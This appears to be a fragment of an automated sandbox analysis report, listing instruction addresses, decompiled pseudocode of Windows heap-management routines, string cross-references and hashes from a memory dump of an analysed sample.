                                          0x01103d3c
                                          0x01103d42
                                          0x01103d44
                                          0x01103d46
                                          0x01103d49
                                          0x01103d4c
                                          0x01103d4f
                                          0x01103d52
                                          0x01103d55
                                          0x01103d58
                                          0x01103d5b
                                          0x01103d5f
                                          0x01103d61
                                          0x01103d66
                                          0x01158213
                                          0x01158218
                                          0x01104085
                                          0x01104088
                                          0x0110408e
                                          0x01104094
                                          0x0110409a
                                          0x011040a0
                                          0x011040a6
                                          0x011040a9
                                          0x011040af
                                          0x011040b6
                                          0x011040bd
                                          0x011040bd
                                          0x01103d83
                                          0x0115821f
                                          0x01158229
                                          0x01158238
                                          0x01158238
                                          0x0115823d
                                          0x0115823d
                                          0x01103da0
                                          0x01103daf
                                          0x01103db5
                                          0x01103dba
                                          0x01103dba
                                          0x01103dd4
                                          0x01103e94
                                          0x01103eab
                                          0x01103f6d
                                          0x01103f84
                                          0x0110406b
                                          0x0110406b
                                          0x0110406e
                                          0x0110406e
                                          0x01104070
                                          0x01104074
                                          0x01158351
                                          0x01158351
                                          0x0110407a
                                          0x0110407f
                                          0x0115835d
                                          0x01158370
                                          0x01158377
                                          0x01158379
                                          0x0115837c
                                          0x0115837c
                                          0x0115835d
                                          0x00000000
                                          0x0110407f
                                          0x01103f8a
                                          0x01103f8d
                                          0x01103f90
                                          0x01103f95
                                          0x0115830d
                                          0x0115830f
                                          0x01103f9b
                                          0x01103fac
                                          0x01103fae
                                          0x01103fb1
                                          0x01103fb1
                                          0x01103fb6
                                          0x01158317
                                          0x0115831a
                                          0x00000000
                                          0x01103fbc
                                          0x01103fc1
                                          0x01103fc9
                                          0x01103fd7
                                          0x01103fda
                                          0x01103fdd
                                          0x01104021
                                          0x01104021
                                          0x01104029
                                          0x01104030
                                          0x01104044
                                          0x01104046
                                          0x01104046
                                          0x01104044
                                          0x01104049
                                          0x01158327
                                          0x01158334
                                          0x01158339
                                          0x0115833c
                                          0x0110404f
                                          0x0110404f
                                          0x0110404f
                                          0x01104051
                                          0x01104056
                                          0x01104063
                                          0x01104063
                                          0x01104068
                                          0x00000000
                                          0x01104068
                                          0x01103fdf
                                          0x01103fe2
                                          0x01103fe4
                                          0x01103fe7
                                          0x01103fef
                                          0x01104003
                                          0x01104005
                                          0x01104005
                                          0x0110400c
                                          0x01104013
                                          0x01104016
                                          0x01104017
                                          0x0110401b
                                          0x0110401e
                                          0x00000000
                                          0x0110401e
                                          0x01103fb6
                                          0x01103eb1
                                          0x01103eb4
                                          0x01103eb7
                                          0x01103ebc
                                          0x011582a9
                                          0x011582ab
                                          0x01103ec2
                                          0x01103ed3
                                          0x01103ed5
                                          0x01103ed8
                                          0x01103ed8
                                          0x01103edd
                                          0x011582b3
                                          0x011582b6
                                          0x00000000
                                          0x01103ee3
                                          0x01103ee8
                                          0x01103eed
                                          0x01103ef0
                                          0x01103ef3
                                          0x01103f02
                                          0x01103f05
                                          0x01103f08
                                          0x011582c0
                                          0x011582c3
                                          0x011582c5
                                          0x011582c8
                                          0x011582d0
                                          0x011582e4
                                          0x011582e6
                                          0x011582e6
                                          0x011582ed
                                          0x011582f4
                                          0x011582f7
                                          0x011582f8
                                          0x011582fc
                                          0x011582ff
                                          0x011582ff
                                          0x01103f0e
                                          0x01103f11
                                          0x01103f16
                                          0x01103f1d
                                          0x01103f31
                                          0x01158307
                                          0x01158307
                                          0x01103f31
                                          0x01103f39
                                          0x01103f48
                                          0x01103f4d
                                          0x01103f50
                                          0x01103f50
                                          0x01103f53
                                          0x01103f58
                                          0x01103f65
                                          0x01103f65
                                          0x01103f6a
                                          0x00000000
                                          0x01103f6a
                                          0x01103edd
                                          0x01103dda
                                          0x01103ddd
                                          0x01103de0
                                          0x01103de5
                                          0x01158245
                                          0x01103deb
                                          0x01103df7
                                          0x01103dfc
                                          0x01103dfe
                                          0x01103e01
                                          0x01103e01
                                          0x01103e06
                                          0x0115824d
                                          0x0115824f
                                          0x01158254
                                          0x00000000
                                          0x01103e0c
                                          0x01103e11
                                          0x01103e16
                                          0x01103e19
                                          0x01103e29
                                          0x01103e2c
                                          0x01103e2f
                                          0x0115825c
                                          0x0115825f
                                          0x01158261
                                          0x01158264
                                          0x0115826c
                                          0x01158280
                                          0x01158282
                                          0x01158282
                                          0x01158289
                                          0x01158290
                                          0x01158293
                                          0x01158294
                                          0x01158298
                                          0x0115829b
                                          0x0115829b
                                          0x01103e35
                                          0x01103e38
                                          0x01103e3d
                                          0x01103e44
                                          0x01103e58
                                          0x011582a3
                                          0x011582a3
                                          0x01103e58
                                          0x01103e60
                                          0x01103e6f
                                          0x01103e74
                                          0x01103e77
                                          0x01103e77
                                          0x01103e7a
                                          0x01103e7f
                                          0x01103e8c
                                          0x01103e8c
                                          0x01103e91
                                          0x00000000
                                          0x01103e91

                                          Strings
                                          • Kernel-MUI-Number-Allowed, xrefs: 01103D8C
                                          • WindowsExcludedProcs, xrefs: 01103D6F
                                          • Kernel-MUI-Language-SKU, xrefs: 01103F70
                                          • Kernel-MUI-Language-Allowed, xrefs: 01103DC0
                                          • Kernel-MUI-Language-Disallowed, xrefs: 01103E97
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 0-258546922
                                          • Opcode ID: 0396abeca19071c4be3dd8413550610861552f03c8521d9e546f32a167eac80e
                                          • Instruction ID: 999f127e11b342b164223f22057229b9562e9ba585f2429fa5abe47b33175c95
                                          • Opcode Fuzzy Hash: 0396abeca19071c4be3dd8413550610861552f03c8521d9e546f32a167eac80e
                                          • Instruction Fuzzy Hash: C2F18072D00619EFCB1ADF99C980AEEBBB9FF48650F15006AE915F7650E7749E00CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010F40E1 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 29%
                                          			E010F40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E010FB150();
					} else {
						E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E010FB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E010FB150(", passed to %s", _t29);
					}
					_push("\n");
					E010FB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x11e6378 = 1;
						asm("int3");
						 *0x11e6378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                          0x010f40e6
                                          0x010f40e8
                                          0x010f40f1
                                          0x0115042d
                                          0x0115044c
                                          0x01150451
                                          0x0115042f
                                          0x01150444
                                          0x01150449
                                          0x0115045d
                                          0x01150466
                                          0x0115046e
                                          0x01150474
                                          0x01150475
                                          0x0115047a
                                          0x0115048a
                                          0x0115048c
                                          0x01150493
                                          0x01150494
                                          0x01150494
                                          0x00000000
                                          0x0115049b
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                          • API String ID: 0-188067316
                                          • Opcode ID: 51122aec8f0c499184cfeaaee6ad3c220a5ce90a5147fe7559b457a09d4004cc
                                          • Instruction ID: c1ffe9512c144993a6de1b3b4975b6dce9c391cc2e5e28201582822dec842dfc
                                          • Opcode Fuzzy Hash: 51122aec8f0c499184cfeaaee6ad3c220a5ce90a5147fe7559b457a09d4004cc
                                          • Instruction Fuzzy Hash: 6501D832104341DED33D97A9E40EF967BA4EB55B30F19406DF5994BA41CBA59480CA51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0111A830 Relevance: 5.4, Strings: 4, Instructions: 350COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E0111A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x11e8748 - 1;
					if( *0x11e8748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E010FB150();
									_t260 = _t257 + 4;
								} else {
									E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E010FB150();
								_t257 = _t260 + 4;
								__eflags =  *0x11e7bc8;
								if(__eflags == 0) {
									E011B2073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E011BA80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E0114D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E0111AB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E011BA80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E011BA80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x11e8748 - 1;
					if( *0x11e8748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E010FB150();
							} else {
								E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E010FB150();
							__eflags =  *0x11e7bc8;
							if(__eflags == 0) {
								_t131 = E011B2073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}























































                                          0x0111a83a
                                          0x0111a83c
                                          0x0111a83e
                                          0x0111a841
                                          0x0111a844
                                          0x0111a84a
                                          0x0111aa53
                                          0x0111aa59
                                          0x0111aa59
                                          0x0111a858
                                          0x0111a85e
                                          0x0111aaf5
                                          0x0111aafc
                                          0x0116229e
                                          0x011622a2
                                          0x011622a8
                                          0x011622b3
                                          0x011622b5
                                          0x011622bb
                                          0x011622c1
                                          0x011622c5
                                          0x011622e6
                                          0x011622eb
                                          0x011622f0
                                          0x011622c7
                                          0x011622dc
                                          0x011622e1
                                          0x011622e1
                                          0x011622f3
                                          0x011622f8
                                          0x011622fd
                                          0x01162300
                                          0x01162307
                                          0x0116230e
                                          0x0116230e
                                          0x01162313
                                          0x01162313
                                          0x011622b5
                                          0x011622a2
                                          0x0111aafc
                                          0x0111a864
                                          0x0111a869
                                          0x0111aa5c
                                          0x0111aa5e
                                          0x0111a86f
                                          0x0111a87f
                                          0x0111a885
                                          0x0111a885
                                          0x0111a88b
                                          0x0111a890
                                          0x0111a896
                                          0x0111ab0c
                                          0x0111ab0f
                                          0x0111ab15
                                          0x01162320
                                          0x01162320
                                          0x0111ab1b
                                          0x0111a89c
                                          0x0111a89f
                                          0x0111a8a2
                                          0x0111a8a2
                                          0x0111a8a5
                                          0x0111a8af
                                          0x0111a8b3
                                          0x0111a8b8
                                          0x0111aa66
                                          0x0111a8be
                                          0x0111a8c5
                                          0x0111a8c6
                                          0x0111a8ce
                                          0x01162328
                                          0x01162332
                                          0x01162337
                                          0x01162337
                                          0x0111a8ce
                                          0x0111a8d4
                                          0x0111a8d8
                                          0x0111a8db
                                          0x0111a8de
                                          0x0111a8e1
                                          0x0111a8e5
                                          0x0111a8e8
                                          0x0111a8f0
                                          0x0111a8f3
                                          0x0116234c
                                          0x01162350
                                          0x01162355
                                          0x01162359
                                          0x01162359
                                          0x0111a8f9
                                          0x0111a901
                                          0x0111aae4
                                          0x0111aae4
                                          0x0111aaea
                                          0x00000000
                                          0x0111a907
                                          0x0111a90a
                                          0x0111a91d
                                          0x0111a91d
                                          0x00000000
                                          0x0111a910
                                          0x0111a910
                                          0x0111a910
                                          0x0111a914
                                          0x0111a924
                                          0x0111a924
                                          0x0111a924
                                          0x0111a924
                                          0x0111a916
                                          0x0111a91b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0111a91b
                                          0x0111a925
                                          0x0111a925
                                          0x0111a932
                                          0x0111a936
                                          0x0111a93c
                                          0x0111a93c
                                          0x0111a93c
                                          0x0111ab22
                                          0x0111ab24
                                          0x0111ab27
                                          0x0111ab27
                                          0x0111a942
                                          0x0111a944
                                          0x0111aaba
                                          0x0111aabd
                                          0x0111aac0
                                          0x0111aac0
                                          0x0111aac2
                                          0x0111ab2f
                                          0x0111aac4
                                          0x0111aac4
                                          0x0111aac7
                                          0x0111aaca
                                          0x0111aacc
                                          0x0111aace
                                          0x0111aace
                                          0x0111aace
                                          0x0111aad1
                                          0x0111aad1
                                          0x0111aad7
                                          0x0111aad9
                                          0x00000000
                                          0x00000000
                                          0x01162361
                                          0x01162369
                                          0x0116236b
                                          0x00000000
                                          0x01162371
                                          0x00000000
                                          0x01162371
                                          0x00000000
                                          0x0116236b
                                          0x0111aac0
                                          0x0111a94a
                                          0x0111a94a
                                          0x0111a94d
                                          0x0111a94d
                                          0x0111a950
                                          0x0111a954
                                          0x01162376
                                          0x01162380
                                          0x0111a95a
                                          0x0111a95a
                                          0x0111a95c
                                          0x0111a95f
                                          0x0111a961
                                          0x0111a961
                                          0x0111a967
                                          0x0111a96a
                                          0x0111a972
                                          0x0111aa02
                                          0x0111aa06
                                          0x0111aa10
                                          0x0111aa16
                                          0x0111aa16
                                          0x0111aa1b
                                          0x0111aa21
                                          0x0111aa24
                                          0x0111aa27
                                          0x0111aa29
                                          0x0111aa2c
                                          0x0111aa32
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0111a978
                                          0x0111a978
                                          0x0111a97b
                                          0x0111a981
                                          0x0111a996
                                          0x0111a998
                                          0x0111a99f
                                          0x0111a9a2
                                          0x0116238a
                                          0x0111a9a8
                                          0x0111a9a8
                                          0x0111a9a8
                                          0x0111a9aa
                                          0x0111a9ad
                                          0x0111a9b0
                                          0x0111a9bb
                                          0x0111a9be
                                          0x0111a9c7
                                          0x0111a9c9
                                          0x0111a9c9
                                          0x0111a9cc
                                          0x0111a9d1
                                          0x0111aa6d
                                          0x0111aa70
                                          0x0111aa73
                                          0x0111aa75
                                          0x0111aa79
                                          0x0111aa7e
                                          0x0111aa82
                                          0x0111aa8f
                                          0x0111aa94
                                          0x0111aa96
                                          0x01162392
                                          0x011623a1
                                          0x011623a1
                                          0x0111aa9c
                                          0x0111aa9f
                                          0x0111aaa2
                                          0x0111aaa2
                                          0x0111aaa8
                                          0x0111aaab
                                          0x0111aaaf
                                          0x00000000
                                          0x0111aab5
                                          0x00000000
                                          0x0111aab5
                                          0x0111a9d7
                                          0x0111a9d7
                                          0x0111a9da
                                          0x0111a9e0
                                          0x0111a9e3
                                          0x0111a9e6
                                          0x0111a9e9
                                          0x0111a9eb
                                          0x0111a9fd
                                          0x0111a9fd
                                          0x00000000
                                          0x0111a9eb
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0111a983
                                          0x0111a983
                                          0x0111a983
                                          0x0111a987
                                          0x0111a995
                                          0x0111a995
                                          0x0111a995
                                          0x0111a995
                                          0x0111a989
                                          0x0111a98e
                                          0x00000000
                                          0x0111a990
                                          0x00000000
                                          0x0111a990
                                          0x0111a98e
                                          0x00000000
                                          0x0111a983
                                          0x0111a972
                                          0x0111a90a
                                          0x0111aa34
                                          0x0111aa34
                                          0x0111aa40
                                          0x0111aa43
                                          0x0111aa46
                                          0x0111aa4d
                                          0x011623ab
                                          0x011623b2
                                          0x011623b8
                                          0x011623be
                                          0x011623c3
                                          0x011623c5
                                          0x011623cb
                                          0x011623d1
                                          0x011623d5
                                          0x011623f6
                                          0x011623fb
                                          0x011623d7
                                          0x011623ec
                                          0x011623f1
                                          0x01162403
                                          0x01162408
                                          0x01162410
                                          0x01162417
                                          0x01162422
                                          0x01162422
                                          0x01162417
                                          0x011623c5
                                          0x011623b2
                                          0x00000000

                                          Strings
                                          • HEAP: , xrefs: 011622E6, 011623F6
                                          • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01162403
                                          • HEAP[%wZ]: , xrefs: 011622D7, 011623E7
                                          • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 011622F3
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                          • API String ID: 0-1657114761
                                          • Opcode ID: f5f8e9beca9221ccb88773bf079d69968daaaa4d6967d0eec6a20cbe6378897a
                                          • Instruction ID: e020549354968ef3a7fe139a0c572b3b18d60a6fae1d92f2057a09a3ef2db874
                                          • Opcode Fuzzy Hash: f5f8e9beca9221ccb88773bf079d69968daaaa4d6967d0eec6a20cbe6378897a
                                          • Instruction Fuzzy Hash: F8D1B034A012868FDB1DCF68D490BA9FBF2BF48300F158579D99A9B74AE331A841CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0111A229 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 69%
                                          			E0111A229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E0111DF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E01139730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E011BA80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E01139660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E010FB150();
					} else {
						E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E010FB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E01117D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E011B138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
